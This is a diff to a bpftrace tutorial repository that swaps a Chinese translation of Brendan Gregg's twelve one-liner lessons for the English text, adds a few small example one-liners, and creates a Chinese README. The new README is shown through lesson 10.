+This teaches you bpftrace for Linux in 12 easy lessons, where each lesson is a one-liner you can try running. This series of one-liners introduces concepts which are summarized as bullet points. For a full reference to bpftrace, see the [Man page](https://github.com/iovisor/bpftrace/blob/master/docs/../man/adoc/bpftrace.adoc).

-该教程贡献者是Brendan Gregg, Netflix (2018), 基于他的FreeBSD DTrace教程系列[DTrace Tutorial](https://wiki.freebsd.org/DTrace/Tutorial)。
+Contributed by Brendan Gregg, Netflix (2018), based on his FreeBSD [DTrace Tutorial](https://wiki.freebsd.org/DTrace/Tutorial).

-# 1. 列出所有探针
+# Lesson 1. Listing Probes

```
bpftrace -l 'tracepoint:syscalls:sys_enter_*'
```

-"bpftrace -l" 列出所有探针,并且可以添加搜索项。
+"bpftrace -l" lists all probes, and a search term can be added.

-- 探针是用于捕获事件数据的检测点。
-- 搜索词支持通配符,如`*`和`?`。
-- "bpftrace -l" 也可以通过管道传递给grep,进行完整的正则表达式搜索。
+- A probe is an instrumentation point for capturing event data.
+- The supplied search term supports wildcards/globs (`*` and `?`).
+- "bpftrace -l" can also be piped to grep(1) for full regular expression searching.

-# 2. Hello World
+# Lesson 2. Hello World

```
# bpftrace -e 'BEGIN { printf("hello world\n"); }'
Attaching 1 probe...
hello world
^C
```

-打印欢迎消息。运行后, 按Ctrl-C结束。
+This prints a welcome message. Run it, then hit Ctrl-C to end.

-- `BEGIN`是一个特殊的探针,在程序开始时触发探针执行(类似awk的BEGIN)。你可以使用它设置变量和打印消息头。
-- 探针可以关联动作,把动作放到{}中。这个例子中,探针被触发时会调用printf()。
+- The word `BEGIN` is a special probe that fires at the start of the program (like awk's BEGIN). You can use it to set variables and print headers.
+- An action can be associated with probes, in { }. This example calls printf() when the probe fires.
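+
+As a tiny extension (our addition, not part of the upstream tutorial), there is also a special `END` probe that fires when tracing ends, which can print a footer to match the `BEGIN` header:
+
+```
+# bpftrace -e 'BEGIN { printf("tracing... hit Ctrl-C to end\n"); } END { printf("done\n"); }'
+```
+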
-# 3. 文件打开
+# Lesson 3. File Opens

```
# bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s %s\n", comm, str(args.filename)); }'
Attaching 1 probe...
snmp-pass /proc/cpuinfo
snmp-pass /proc/stat
snmpd /proc/net/dev
snmpd /proc/net/if_inet6
^C
```

-这里我们在文件打开的时候打印进程名和文件名。
+This traces file opens as they happen, and we're printing the process name and pathname.

-- 该命令以`tracepoint:syscalls:sys_enter_openat`开始: 这是tracepoint探针类型(内核静态跟踪),当进入`openat()`系统调用时执行该探针。相比kprobes探针(内核动态跟踪,在第6节介绍),我们更加喜欢用tracepoints探针,因为tracepoints有稳定的应用程序编程接口。注意:现代linux系统(glibc >= 2.26),`open`总是调用`openat`系统调用。
-- `comm`是内建变量,代表当前进程的名字。其它类似的变量还有pid和tid,分别表示进程标识和线程标识。
-- `args`是一个包含所有tracepoint参数的结构。这个结构是由bpftrace根据tracepoint信息自动生成的。这个结构的成员可以通过命令`bpftrace -vl tracepoint:syscalls:sys_enter_openat`找到。
-- `args.filename`用来获取args的成员变量`filename`的值。
-- `str()`用来把字符串指针转换成字符串。
+- It begins with the probe `tracepoint:syscalls:sys_enter_openat`: this is the tracepoint probe type (kernel static tracing), and is instrumenting when the `openat()` syscall begins (is entered). Tracepoints are preferred over kprobes (kernel dynamic tracing, introduced in lesson 6), since tracepoints have a stable API. Note: In modern Linux systems (glibc >= 2.26) the `open` wrapper always calls the `openat` syscall.
+- `comm` is a builtin variable that has the current process's name. Other similar builtins include pid and tid.
+- `args` is a struct containing all the tracepoint arguments. This struct is automatically generated by bpftrace based on the tracepoint information. The members of this struct can be found with: `bpftrace -vl tracepoint:syscalls:sys_enter_openat`.
+- `args.filename` accesses the `args` struct and gets the value of the `filename` member.
+- `str()` turns a pointer into the string it points to.

-# 4. 进程级系统调用计数
+# Lesson 4. Syscall Counts By Process

```
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }'
Attaching 1 probe...
^C

@[bpftrace]: 6
@[systemd]: 24
@[snmp-pass]: 96
@[sshd]: 125
```

-按Ctrl-C后打印进程的系统调用计数。
+This summarizes syscalls by process name, printing a report on Ctrl-C.

-- @: 表示一种特殊的变量类型,称为map,可以以不同的方式来存储和描述数据。你可以在@后添加可选的变量名(如@num),用来增加可读性或者区分不同的map。
-- []: 可选的中括号允许设置map的关键字,比较像关联数组。
-- count(): 这是一个map函数 - 记录被调用次数。因为调用次数根据comm保存在map里,输出结果是进程执行系统调用的次数统计。
+- @: This denotes a special variable type called a map, which can store and summarize data in different ways. You can add an optional variable name after the @, eg "@num", either to improve readability, or to differentiate between more than one map.
+- []: The optional brackets allow a key to be set for the map, much like an associative array.
+- count(): This is a map function – the way it is populated. count() counts the number of times it is called. Since this is saved by comm, the result is a frequency count of system calls by process name.

-Maps会在bpftrace结束(如按Ctrl-C)时自动打印出来。
+Maps are automatically printed when bpftrace ends (eg, via Ctrl-C).
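+
+As a quick variation (our addition, not part of the upstream tutorial), a map can be both named and keyed on more than one value; this counts syscalls per process name and PID pair, which separates processes that share a name:
+
+```
+# bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @num[comm, pid] = count(); }'
+```
+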
-# 5. read()返回值分布统计
+# Lesson 5. Distribution of read() Bytes

```
# bpftrace -e 'tracepoint:syscalls:sys_exit_read /pid == 18644/ { @bytes = hist(args.ret); }'
Attaching 1 probe...
^C

@bytes:
[0, 1] 12 |@@@@@@@@@@@@@@@@@@@@ |
[2, 4) 18 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
[4, 8) 0 | |
[8, 16) 0 | |
[16, 32) 0 | |
[32, 64) 30 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@|
[64, 128) 19 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
[128, 256) 1 |@
```

-这里统计进程号为18644的进程执行内核函数sys_read()的返回值,并打印出直方图。
-- /.../: 这里设置一个过滤条件(条件判断),满足该过滤条件时才执行{}里面的动作。在这个例子中意思是只追踪进程号为18644的进程。过滤条件表达式也支持布尔运算,如("&&", "||")。
-- ret: 表示函数的返回值。对于sys_read(),它可能是-1(错误)或者成功读取的字节数。
-- @: 类似于上节的map,但是这里没有key,即[]。该map的名称"bytes"会出现在输出中。
-- hist(): 一个map函数,用来描述直方图的参数。输出行以2次方的间隔开始,如`[128, 256)`表示值大于等于128且小于256。后面跟着位于该区间的参数个数统计,最后是ascii码表示的直方图。该图可以用来研究它的模式分布。
-- 其它的map函数还有lhist(线性直方图),count(),sum(),avg(),min()和max()。
+This summarizes the return value of the sys_read() kernel function for PID 18644, printing it as a histogram.
+
+- /.../: This is a filter (aka predicate), which acts as a filter for the action. The action is only executed if the filter expression is true, in this case, only for the process ID 18644. Boolean operators are supported ("&&", "||").
+- ret: This is the return value of the function. For sys_read(), this is either -1 (error) or the number of bytes successfully read.
+- @: This is a map similar to the previous lesson, but without any keys ([]) this time, and the name "bytes" which decorates the output.
+- hist(): This is a map function which summarizes the argument as a power-of-2 histogram. The output shows rows that begin with interval notation, where, for example, `[128, 256)` means that the value is: 128 <= value < 256. The next number is the count of occurrences, and then an ASCII histogram is printed to visualize that count. The histogram can be used to study multi-modal distributions.
+- Other map functions include lhist() (linear hist), count(), sum(), avg(), min(), and max().

-# 6. 内核动态跟踪read()返回的字节数
+# Lesson 6. Kernel Dynamic Tracing of read() Bytes

```
# bpftrace -e 'kretprobe:vfs_read { @bytes = lhist(retval, 0, 2000, 200); }'
Attaching 1 probe...
^C

@bytes:
(...,0] 0 | |
[0, 200) 66 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@|
[200, 400) 2 |@ |
[400, 600) 3 |@@ |
[600, 800) 0 | |
[800, 1000) 5 |@@@ |
[1000, 1200) 0 | |
[1200, 1400) 0 | |
[1400, 1600) 0 | |
[1600, 1800) 0 | |
[1800, 2000) 0 | |
[2000,...) 39 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
```

-使用内核动态跟踪技术显示read()返回字节数的直方图。
+Summarize read() bytes as a linear histogram, traced using kernel dynamic tracing.

-- `kretprobe:vfs_read`: 这是kretprobe类型(动态跟踪内核函数返回值)的探针,跟踪`vfs_read`内核函数。此外还有kprobe类型的探针(在下一节介绍)用于跟踪内核函数的调用。它们是功能强大的探针类型,让我们可以跟踪成千上万的内核函数。然而它们是"不稳定"的探针类型:由于它们可以跟踪任意内核函数,对于不同的内核版本,kprobe和kretprobe不一定能够正常工作。因为内核函数名,参数,返回值和作用等可能会变化。此外,由于它们用来跟踪底层内核的,你需要浏览内核源代码,理解这些探针的参数和返回值的意义。
-- lhist(): 线性直方图函数:参数分别是value,最小值,最大值,步进值。第一个参数(`retval`)表示系统调用sys_read()返回值:即成功读取的字节数。
+- It begins with the probe `kretprobe:vfs_read`: this is the kretprobe probe type (kernel dynamic tracing of function returns) instrumenting the `vfs_read()` kernel function. There is also the kprobe probe type (shown in the next lesson), to instrument when functions begin execution (are entered). These are powerful probe types, letting you trace tens of thousands of different kernel functions. However, these are "unstable" probe types: since they can trace any kernel function, there is no guarantee that your kprobe/kretprobe will work between kernel versions, as the function names, arguments, return values, and roles may change. Also, since it is tracing the raw kernel, you'll need to browse the kernel source to understand what these probes, arguments, and return values mean.
+- lhist(): this is a linear histogram, where the arguments are: value, min, max, step. The first argument to lhist() (`retval`) is the return value of vfs_read(): the number of bytes read.
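+
+As a small extra exercise (our addition, not from the upstream tutorial), the filter and kretprobe concepts combine naturally; this counts zero-byte (end-of-file) reads by process name:
+
+```
+# bpftrace -e 'kretprobe:vfs_read /retval == 0/ { @eof[comm] = count(); }'
+```
+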
-# 7. read()调用的时间
+# Lesson 7. Timing read()s

```
# bpftrace -e 'kprobe:vfs_read { @start[tid] = nsecs; } kretprobe:vfs_read /@start[tid]/ { @ns[comm] = hist(nsecs - @start[tid]); delete(@start[tid]); }'
Attaching 2 probes...

[...]
@ns[snmp-pass]:
[0, 1] 0 | |
[2, 4) 0 | |
[4, 8) 0 | |
[8, 16) 0 | |
[16, 32) 0 | |
[32, 64) 0 | |
[64, 128) 0 | |
[128, 256) 0 | |
[256, 512) 27 |@@@@@@@@@ |
[512, 1k) 125 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
[1k, 2k) 22 |@@@@@@@ |
[2k, 4k) 1 | |
[4k, 8k) 10 |@@@ |
[8k, 16k) 1 | |
[16k, 32k) 3 |@ |
[32k, 64k) 144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@|
[64k, 128k) 7 |@@ |
[128k, 256k) 28 |@@@@@@@@@@ |
[256k, 512k) 2 | |
[512k, 1M) 3 |@ |
[1M, 2M) 1 | |
```

-根据进程名,以直方图的形式显示read()调用花费的时间,时间单位为纳秒。
+Summarize the time spent in read(), in nanoseconds, as a histogram, by process name.

-- @start[tid]: 使用线程ID作为key。某一时刻,可能有许许多多的read调用正在进行,我们希望为每个调用记录一个起始时间戳。这要如何做到呢?我们可以为每个read调用建立一个唯一的标识符,并用它作为key进行统计。由于内核线程一次只能执行一个系统调用,我们可以使用线程ID作为上述标识符。
-- nsecs: 自系统启动到现在的纳秒数。这是一个高精度时间戳,可以用来对事件计时。
-- /@start[tid]/: 该过滤条件检查起始时间戳是否被记录。程序可能在某次read调用中途被启动,如果没有这个过滤条件,这个调用的时间会被统计为now-zero,而不是now-start。
-- delete(@start[tid]): 释放变量。
+- @start[tid]: This uses the thread ID as a key. There may be many reads in-flight, and we want to store a start timestamp to each. How? We could construct a unique identifier for each read, and use that as the key. But because kernel threads can only be executing one syscall at a time, we can use the thread ID as the unique identifier, as each thread cannot be executing more than one.
+- nsecs: Nanoseconds since boot. This is a high resolution timestamp counter that can be used to time events.
+- /@start[tid]/: This filter checks that the start time was seen and recorded. Without this filter, this program may be launched during a read and only catch the end, resulting in a time calculation of now - zero, instead of now - start.
+- delete(@start[tid]): This frees the variable.

-# 8. 统计进程级别的事件
+# Lesson 8. Count Process-Level Events

```
# bpftrace -e 'tracepoint:sched:sched* { @[probe] = count(); } interval:s:5 { exit(); }'
Attaching 25 probes...
@[tracepoint:sched:sched_wakeup_new]: 1
@[tracepoint:sched:sched_process_fork]: 1
@[tracepoint:sched:sched_process_exec]: 1
@[tracepoint:sched:sched_process_exit]: 1
@[tracepoint:sched:sched_process_free]: 2
@[tracepoint:sched:sched_process_wait]: 7
@[tracepoint:sched:sched_wake_idle_without_ipi]: 53
@[tracepoint:sched:sched_stat_runtime]: 212
@[tracepoint:sched:sched_wakeup]: 253
@[tracepoint:sched:sched_waking]: 253
@[tracepoint:sched:sched_switch]: 510
```

-这里统计5秒内进程级的事件并打印。
+Count process-level events for five seconds, printing a summary.

-- sched: `sched`探针可以探测调度器的高级事件和进程事件如fork, exec和上下文切换。
-- probe: 探针的完整名称。
-- interval:s:5: 这是一个每5秒在每个CPU上触发一次的探针,它用来创建脚本级别的间隔或超时时间。
-- exit(): 退出bpftrace。
+- sched: The `sched` probe category has high-level scheduler and process events, such as fork, exec, and context switch.
+- probe: The full name of the probe.
+- interval:s:5: This is a probe that fires once every 5 seconds, on one CPU only. It is used for creating script-level intervals or timeouts.
+- exit(): This exits bpftrace.

-# 9. 分析内核实时函数栈
+# Lesson 9. Profile On-CPU Kernel Stacks

```
# bpftrace -e 'profile:hz:99 { @[kstack] = count(); }'
Attaching 1 probe...
^C

[...]
@[
filemap_map_pages+181
__handle_mm_fault+2905
handle_mm_fault+250
__do_page_fault+599
async_page_fault+69
]: 12
[...]
@[
cpuidle_enter_state+164
do_idle+390
cpu_startup_entry+111
start_secondary+423
secondary_startup_64+165
]: 22122
```

-以99赫兹的频率分析内核调用栈并打印次数统计。
+Profile kernel stacks at 99 Hertz, printing a frequency count.

-- profile:hz:99: 这里所有cpu都以99赫兹的频率采样分析内核栈。为什么是99而不是100或者1000?我们想要抓取足够详细的内核执行时内核栈信息,但是频率太大影响性能。100赫兹足够了,但是我们不想用正好100赫兹,这样采样频率可能与其他定时事件步调一致,所以99赫兹是一个理想的选择。
-- kstack: 返回内核调用栈。这里作为map的关键字,可以跟踪次数。这些输出信息可以使用火焰图可视化。此外`ustack`用来分析用户级堆栈。
+- profile:hz:99: This fires on all CPUs at 99 Hertz. Why 99 and not 100 or 1000? We want a rate frequent enough to catch both the big and small picture of execution, but not so frequent as to perturb performance. 100 Hertz is enough. But we don't want 100 exactly, as sampling may occur in lockstep with other timed activities, hence 99.
+- kstack: Returns the kernel stack trace. This is used as a key for the map, so that it can be frequency counted. The output of this is ideal to be visualized as a flame graph. There is also `ustack` for the user-level stack trace.

-# 10. 调度器跟踪
+# Lesson 10. Scheduler Tracing

```
# bpftrace -e 'tracepoint:sched:sched_switch { @[kstack] = count(); }'
^C
[...]

@[
__schedule+697
__schedule+697
schedule+50
schedule_timeout+365
xfsaild+274
kthread+248
ret_from_fork+53
]: 73
@[
__schedule+697
__schedule+697
schedule_idle+40
do_idle+356
cpu_startup_entry+111
start_secondary+423
secondary_startup_64+165
]: 305
```

-这里统计进程上下文切换次数。以上输出被截断,只输出了最后两个结果。
+This counts stack traces that led to context switching (off-CPU) events. The above output has been truncated to show the last two only.

-- sched: 跟踪调度类别的调度器事件:sched_switch, sched_wakeup, sched_migrate_task等。
-- sched_switch: 当线程释放cpu资源,当前不运行时触发。这里可能的阻塞事件:如等待I/O,定时器,分页/交换,锁等。
-- kstack: 内核堆栈跟踪,打印调用栈。
-- sched_switch在线程切换的时候触发,打印的调用栈是被切换出cpu的那个线程。像你使用其他探针一样,注意这里的上下文,例如comm, pid, kstack等等,并不一定反映了探针的目标的状态。
+- sched: The sched category has tracepoints for different kernel CPU scheduler events: sched_switch, sched_wakeup, sched_migrate_task, etc.
+- sched_switch: This probe fires when a thread leaves CPU. This will be a blocking event: eg, waiting on I/O, a timer, paging/swapping, or a lock.
+- kstack: A kernel stack trace.
+- sched_switch fires in thread context, so that the stack refers to the thread that is leaving.
As you use other probe types, pay attention to context, as comm, pid, kstack, etc, may not refer to the target of the probe. -# 11. 块级I/O跟踪 +# Lesson 11. Block I/O Tracing ``` # bpftrace -e 'tracepoint:block:block_rq_issue { @ = hist(args.bytes); }' @@ -279,15 +284,15 @@ Attaching 1 probe... ``` -以上是块I/O请求字节数的直方图。 +Block I/O requests by size in bytes, as a histogram. -- tracepoint:block: 块类别的跟踪点跟踪块级I/O事件。 -- block_rq_issue: 当I/O提交到块设备时触发。 -- args.bytes: 跟踪点block_rq_issue的参数成员bytes,表示提交I/O请求的字节数。 +- tracepoint:block: The block category of tracepoints traces various block I/O (storage) events. +- block_rq_issue: This fires when an I/O is issued to the device. +- args.bytes: This is a member from the tracepoint block_rq_issue arguments which shows the size in bytes. -该探针的上下文是非常重要的: 它在I/O请求被提交给块设备时触发。这通常发生在进程上下文,此时通过内核的comm可以得到进程名;也可能发生在内核上下文,(如readahead),此时不能显示预期的进程号和进程名信息。 +The context of this probe is important: this fires when the I/O is issued to the device. This often happens in process context, where builtins like comm will show you the process name, but it can also happen from kernel context (eg, readahead) when the pid and comm will not show the application you expect. -# 12. 内核结构跟踪 +# Lesson 12. Kernel Struct Tracing ``` # cat path.bt @@ -309,16 +314,15 @@ open path: retrans_time_ms [...] ``` +This uses kernel dynamic tracing of the vfs_open() function, which has a (struct path *) as the first argument. -这里使用内核动态跟踪技术跟踪vfs_read()函数,该函数的(struct path *)作为第一个参数。 +- kprobe: As mentioned earlier, this is the kernel dynamic tracing probe type, which traces the entry of kernel functions (use kretprobe to trace their returns). +- `arg0` is a builtin variable containing the first probe argument, the meaning of which is defined by the probe type. For `kprobe`, it is the first argument to the function. Other arguments can be accessed as arg1, ..., argN. +- `((struct path *)arg0)->dentry->d_name.name`: this casts `arg0` as `struct path *`, then dereferences dentry, etc. +- #include: these are necessary to include struct definitions for path and dentry on systems where the kernel was built without BTF (BPF Type Format) data. -- kprobe: 如前面所述,这是内核动态跟踪kprobe探针类型,跟踪内核函数的调用(kretprobe探针类型跟踪内核函数返回值)。 -- `arg0` 是一个内建变量,表示探针的第一个参数,其含义由探针类型决定。对于`kprobe`类型探针,它表示函数的第一个参数。其它参数使用arg1,...,argN访问。 -- `((struct path *)arg0)->dentry->d_name.name`: 这里`arg0`作为`struct path *`并引用dentry。 -- #include: 在没有BTF (BPF Type Format) 的情况下,包含必要的path和dentry类型声明的头文件。 +The kernel struct support is the same as bcc, making use of kernel headers. This means that many structs are available, but not everything, and sometimes it might be necessary to manually include a struct. For an example of this, see the [dcsnoop tool](https://github.com/iovisor/bpftrace/blob/master/docs/../tools/dcsnoop.bt), which includes a portion of struct nameidata manually as it wasn't in the available headers. If the kernel has BTF data, all kernel structs are always available. -bpftrace对内核结构跟踪的支持和bcc是一样的,允许使用内核头文件。这意味着大多数结构是可用的,但是并不是所有的,有时需要手动增加某些结构的声明。例如这个例子,见[dcsnoop tool](https://github.com/iovisor/bpftrace/blob/master/docs/../tools/dcsnoop.bt),包含struct nameidata的声明。倘若内核有提供BTF数据,则所有结构都可用。 +At this point you understand much of bpftrace, and can begin to use and write powerful one-liners. See the [Reference Guide](https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md) for more capabilities. 
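+
+As a parting self-test (our addition, not part of the upstream tutorial), try combining the probe, filter, map, and str() concepts from the lessons above; for example, counting which files a given process opens, assuming a "bash" process is running on the system:
+
+```
+# bpftrace -e 'tracepoint:syscalls:sys_enter_openat /comm == "bash"/ { @opens[str(args.filename)] = count(); }'
+```
+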
-现在,你已经理解了bpftrace的大部分功能,你可以开始使用和编写强大的一行命令。查阅[参考手册](https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md)更多的功能。 - -> 原文地址:https://github.com/iovisor/bpftrace/blob/master/docs +> The original tutorial link: https://github.com/iovisor/bpftrace/blob/master/docs/ diff --git a/src/bpftrace-tutorial/README.zh.md b/src/bpftrace-tutorial/README.zh.md new file mode 100644 index 0000000..010f506 --- /dev/null +++ b/src/bpftrace-tutorial/README.zh.md @@ -0,0 +1,324 @@ +# bpftrace一行教程 + +该教程通过12个简单小节帮助你了解bpftrace的使用。每一小节都是一行的命令,你可以尝试运行并立刻看到运行效果。该教程系列用来介绍bpftrace的概念。关于bpftrace的完整参考,见[bpftrace手册](https://github.com/iovisor/bpftrace/blob/master/man/adoc/bpftrace.adoc)。 + +该教程贡献者是Brendan Gregg, Netflix (2018), 基于他的FreeBSD DTrace教程系列[DTrace Tutorial](https://wiki.freebsd.org/DTrace/Tutorial)。 + +# 1. 列出所有探针 + +``` +bpftrace -l 'tracepoint:syscalls:sys_enter_*' +``` + +"bpftrace -l" 列出所有探针,并且可以添加搜索项。 + +- 探针是用于捕获事件数据的检测点。 +- 搜索词支持通配符,如`*`和`?`。 +- "bpftrace -l" 也可以通过管道传递给grep,进行完整的正则表达式搜索。 + +# 2. Hello World + +``` +# bpftrace -e 'BEGIN { printf("hello world\n"); }' +Attaching 1 probe... +hello world +^C +``` + +打印欢迎消息。运行后, 按Ctrl-C结束。 + +- `BEGIN`是一个特殊的探针,在程序开始时触发探针执行(类似awk的BEGIN)。你可以使用它设置变量和打印消息头。 +- 探针可以关联动作,把动作放到{}中。这个例子中,探针被触发时会调用printf()。 + +# 3. 文件打开 + +``` +# bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s %s\n", comm, str(args.filename)); }' +Attaching 1 probe... +snmp-pass /proc/cpuinfo +snmp-pass /proc/stat +snmpd /proc/net/dev +snmpd /proc/net/if_inet6 +^C +``` + +这里我们在文件打开的时候打印进程名和文件名。 + +- 该命令以`tracepoint:syscalls:sys_enter_openat`开始: 这是tracepoint探针类型(内核静态跟踪),当进入`openat()`系统调用时执行该探针。相比kprobes探针(内核动态跟踪,在第6节介绍),我们更加喜欢用tracepoints探针,因为tracepoints有稳定的应用程序编程接口。注意:现代linux系统(glibc >= 2.26),`open`总是调用`openat`系统调用。 +- `comm`是内建变量,代表当前进程的名字。其它类似的变量还有pid和tid,分别表示进程标识和线程标识。 +- `args`是一个包含所有tracepoint参数的结构。这个结构是由bpftrace根据tracepoint信息自动生成的。这个结构的成员可以通过命令`bpftrace -vl tracepoint:syscalls:sys_enter_openat`找到。 +- `args.filename`用来获取args的成员变量`filename`的值。 +- `str()`用来把字符串指针转换成字符串。 + +# 4. 进程级系统调用计数 + +``` +bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }' +Attaching 1 probe... +^C + +@[bpftrace]: 6 +@[systemd]: 24 +@[snmp-pass]: 96 +@[sshd]: 125 +``` + +按Ctrl-C后打印进程的系统调用计数。 + +- @: 表示一种特殊的变量类型,称为map,可以以不同的方式来存储和描述数据。你可以在@后添加可选的变量名(如@num),用来增加可读性或者区分不同的map。 +- []: 可选的中括号允许设置map的关键字,比较像关联数组。 +- count(): 这是一个map函数 - 记录被调用次数。因为调用次数根据comm保存在map里,输出结果是进程执行系统调用的次数统计。 + +Maps会在bpftrace结束(如按Ctrl-C)时自动打印出来。 + +# 5. read()返回值分布统计 + +``` +# bpftrace -e 'tracepoint:syscalls:sys_exit_read /pid == 18644/ { @bytes = hist(args.ret); }' +Attaching 1 probe... +^C + +@bytes: +[0, 1] 12 |@@@@@@@@@@@@@@@@@@@@ | +[2, 4) 18 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | +[4, 8) 0 | | +[8, 16) 0 | | +[16, 32) 0 | | +[32, 64) 30 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| +[64, 128) 19 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | +[128, 256) 1 |@ +``` + +这里统计进程号为18644的进程执行内核函数sys_read()的返回值,并打印出直方图。 +- /.../: 这里设置一个过滤条件(条件判断),满足该过滤条件时才执行{}里面的动作。在这个例子中意思是只追踪进程号为18644的进程。过滤条件表达式也支持布尔运算,如("&&", "||")。 +- ret: 表示函数的返回值。对于sys_read(),它可能是-1(错误)或者成功读取的字节数。 +- @: 类似于上节的map,但是这里没有key,即[]。该map的名称"bytes"会出现在输出中。 +- hist(): 一个map函数,用来描述直方图的参数。输出行以2次方的间隔开始,如`[128, 256)`表示值大于等于128且小于256。后面跟着位于该区间的参数个数统计,最后是ascii码表示的直方图。该图可以用来研究它的模式分布。 +- 其它的map函数还有lhist(线性直方图),count(),sum(),avg(),min()和max()。 + +# 6. 内核动态跟踪read()返回的字节数 + +``` +# bpftrace -e 'kretprobe:vfs_read { @bytes = lhist(retval, 0, 2000, 200); }' +Attaching 1 probe... 
+^C + +@bytes: +(...,0] 0 | | +[0, 200) 66 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| +[200, 400) 2 |@ | +[400, 600) 3 |@@ | +[600, 800) 0 | | +[800, 1000) 5 |@@@ | +[1000, 1200) 0 | | +[1200, 1400) 0 | | +[1400, 1600) 0 | | +[1600, 1800) 0 | | +[1800, 2000) 0 | | +[2000,...) 39 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | +``` + +使用内核动态跟踪技术显示read()返回字节数的直方图。 + +- `kretprobe:vfs_read`: 这是kretprobe类型(动态跟踪内核函数返回值)的探针,跟踪`vfs_read`内核函数。此外还有kprobe类型的探针(在下一节介绍)用于跟踪内核函数的调用。它们是功能强大的探针类型,让我们可以跟踪成千上万的内核函数。然而它们是"不稳定"的探针类型:由于它们可以跟踪任意内核函数,对于不同的内核版本,kprobe和kretprobe不一定能够正常工作。因为内核函数名,参数,返回值和作用等可能会变化。此外,由于它们用来跟踪底层内核的,你需要浏览内核源代码,理解这些探针的参数和返回值的意义。 +- lhist(): 线性直方图函数:参数分别是value,最小值,最大值,步进值。第一个参数(`retval`)表示系统调用sys_read()返回值:即成功读取的字节数。 + +# 7. read()调用的时间 + +``` +# bpftrace -e 'kprobe:vfs_read { @start[tid] = nsecs; } kretprobe:vfs_read /@start[tid]/ { @ns[comm] = hist(nsecs - @start[tid]); delete(@start[tid]); }' +Attaching 2 probes... + +[...] +@ns[snmp-pass]: +[0, 1] 0 | | +[2, 4) 0 | | +[4, 8) 0 | | +[8, 16) 0 | | +[16, 32) 0 | | +[32, 64) 0 | | +[64, 128) 0 | | +[128, 256) 0 | | +[256, 512) 27 |@@@@@@@@@ | +[512, 1k) 125 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | +[1k, 2k) 22 |@@@@@@@ | +[2k, 4k) 1 | | +[4k, 8k) 10 |@@@ | +[8k, 16k) 1 | | +[16k, 32k) 3 |@ | +[32k, 64k) 144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| +[64k, 128k) 7 |@@ | +[128k, 256k) 28 |@@@@@@@@@@ | +[256k, 512k) 2 | | +[512k, 1M) 3 |@ | +[1M, 2M) 1 | | +``` + +根据进程名,以直方图的形式显示read()调用花费的时间,时间单位为纳秒。 + +- @start[tid]: 使用线程ID作为key。某一时刻,可能有许许多多的read调用正在进行,我们希望为每个调用记录一个起始时间戳。这要如何做到呢?我们可以为每个read调用建立一个唯一的标识符,并用它作为key进行统计。由于内核线程一次只能执行一个系统调用,我们可以使用线程ID作为上述标识符。 +- nsecs: 自系统启动到现在的纳秒数。这是一个高精度时间戳,可以用来对事件计时。 +- /@start[tid]/: 该过滤条件检查起始时间戳是否被记录。程序可能在某次read调用中途被启动,如果没有这个过滤条件,这个调用的时间会被统计为now-zero,而不是now-start。 +- delete(@start[tid]): 释放变量。 + +# 8. 统计进程级别的事件 + +``` +# bpftrace -e 'tracepoint:sched:sched* { @[probe] = count(); } interval:s:5 { exit(); }' +Attaching 25 probes... +@[tracepoint:sched:sched_wakeup_new]: 1 +@[tracepoint:sched:sched_process_fork]: 1 +@[tracepoint:sched:sched_process_exec]: 1 +@[tracepoint:sched:sched_process_exit]: 1 +@[tracepoint:sched:sched_process_free]: 2 +@[tracepoint:sched:sched_process_wait]: 7 +@[tracepoint:sched:sched_wake_idle_without_ipi]: 53 +@[tracepoint:sched:sched_stat_runtime]: 212 +@[tracepoint:sched:sched_wakeup]: 253 +@[tracepoint:sched:sched_waking]: 253 +@[tracepoint:sched:sched_switch]: 510 +``` + +这里统计5秒内进程级的事件并打印。 + +- sched: `sched`探针可以探测调度器的高级事件和进程事件如fork, exec和上下文切换。 +- probe: 探针的完整名称。 +- interval:s:5: 这是一个每5秒在每个CPU上触发一次的探针,它用来创建脚本级别的间隔或超时时间。 +- exit(): 退出bpftrace。 + +# 9. 分析内核实时函数栈 + +``` +# bpftrace -e 'profile:hz:99 { @[kstack] = count(); }' +Attaching 1 probe... +^C + +[...] +@[ +filemap_map_pages+181 +__handle_mm_fault+2905 +handle_mm_fault+250 +__do_page_fault+599 +async_page_fault+69 +]: 12 +[...] +@[ +cpuidle_enter_state+164 +do_idle+390 +cpu_startup_entry+111 +start_secondary+423 +secondary_startup_64+165 +]: 22122 +``` + +以99赫兹的频率分析内核调用栈并打印次数统计。 + +- profile:hz:99: 这里所有cpu都以99赫兹的频率采样分析内核栈。为什么是99而不是100或者1000?我们想要抓取足够详细的内核执行时内核栈信息,但是频率太大影响性能。100赫兹足够了,但是我们不想用正好100赫兹,这样采样频率可能与其他定时事件步调一致,所以99赫兹是一个理想的选择。 +- kstack: 返回内核调用栈。这里作为map的关键字,可以跟踪次数。这些输出信息可以使用火焰图可视化。此外`ustack`用来分析用户级堆栈。 + +# 10. 调度器跟踪 + +``` +# bpftrace -e 'tracepoint:sched:sched_switch { @[kstack] = count(); }' +^C +[...] 
